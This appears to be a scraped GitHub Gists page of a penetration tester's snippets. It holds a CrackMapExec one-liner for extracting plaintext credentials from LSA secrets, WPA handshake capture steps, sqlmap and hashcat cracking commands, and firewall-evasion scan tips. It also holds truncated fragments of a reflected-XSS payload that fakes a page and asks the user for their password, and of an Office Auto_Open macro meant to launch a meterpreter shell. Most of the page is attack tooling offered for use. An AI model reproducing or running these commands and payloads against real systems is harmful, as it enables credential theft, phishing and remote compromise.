Drew hoodoer
💻
hoodoer
/ cmeTricks.txt
Created
December 10, 2019 09:33
Crack Map Exec (CME) oneliner to parse out plaintext creds from cme --lsa
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cat ~/.cme/logs/*secrets | egrep -v '(sha1|md5|DPAPI_SYSTEM|dpapi|NL\$KM|L\$|\$:aad3b435b51404eeaad3b435b51404ee)' | sort -u |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wpscan.rb --url http://yourwebsite.com --enumerate dbe | |
| database exports | |
| wpscan.rb --url http://yourwebsite.com --enumerate cb | |
| config backups | |
| wpscan.rb --url http://yourwebsite.com --enumerate vp | |
| vuln plugins | |
| wpscan.rb --url http://yourwebsite.com --enumerate vt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /usr/bin/vmhgfs-fuse .host:/ /mnt/hgfs -o subtype=vmhgfs-fuse,allow_other | |
| This seems to work too in fstab: | |
| vmhgfs-fuse /mnt/hgfs fuse defaults,allow_other 0 0 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| airmon-ng check kill | |
| https://forums.hak5.org/topic/37247-capturing-wpawpa2-passwords-with-the-nanotetra/ | |
| On nano, or other wifi access point monitoring: | |
| airmon-ng start wlan1 | |
| airodump-ng -w PacketCapture wlan1mon | |
| (Then just do near the AP you're wanting to crack and wait for someone to connect to it.) |
hoodoer
/ firewallScanningTips.txt
Created
December 10, 2019 09:38
Tough Firewall Scanning tips for hard to detect services, firewalls that are generally a pain in the butt.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Hard to detect service, tweaks to nmap to help: | |
| Slow it down with -T2 or -T1 | |
| Use masscan | |
| Fin scans | |
| Null scans | |
| XMas scans | |
| Fragment scans | |
| Data length scan | |
| TTL scan |
hoodoer
/ betterXssBackgroundImage.txt
Last active
June 2, 2021 15:24
Simple reflected XSS trick to blank page, set background image (such as an appropriate application page), and prompt user. Great on XSS on messy pages, can make it look like a login page quickly for a screenshot.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <script> | |
| // Fake the application with a screenshot | |
| document.body.outerHTML = ''; | |
| document.body.innerHTML = ''; | |
| document.body.style.backgroundImage = "url('http://localhost:80/background.png')"; | |
| document.body.style.backgroundRepeat = "no-repeat"; | |
| // Ask user to re-enter their password |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sqlmap --users --keep-alive --dbms=sqlite --headers="Authorization: Basic BASICAUTHBASE64" -u http://SOMEURL.com |
hoodoer
/ osxMacro.txt
Created
December 10, 2019 09:49
Mac OSX MS Office Meterpreter Macro (Python and Macscript)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| For putting in excel. You can ignore the worksheets part, I used that to replace values in cells to know if a user had run macros or not when they sent the spreadsheet back. | |
| Put #MACRO LOOKUP ERROR in fields, if use runs macros it'll fix the values, refresh the screen, and pop python meterpreter shell: | |
| Sub Auto_Open() | |
| '#MACRO LOOK ERROR | |
| Worksheets("Sheet1").Range("H1") = "Quick Ratio" |
hoodoer
/ SleuthQL Loop Tricks.txt
Last active
September 20, 2024 15:09
SleuthQL Loop, commands to use the output from sleuthQL.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sleuthql.py -d domainname -f proxyHistory.xml | |
| for i in ./*.txt; do sqlmap -r $i --batch; done | |
| Forcing https/ssl: | |
| --force-ssl | |
| Random user agent: | |
| --random-agent |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| IKE-PSK: | |
| ./hashcat -m 5300 vpn.psk ../PasswordLists/Top109Million-probable-v2.txt -a 0 -r rules/wtf.rule -O | |
| Responder: | |
| hashcat -m 5600 hashes\hash.txt password_list.txt -o cracked\cracked.txt -O -r rules/best64.rule | |
| example: | |
| ./hashcat -m 5600 hashes.txt ../../VM\ Share/PasswordLists/rockyou.txt -o passwords.txt -O -r rules/best66.rule |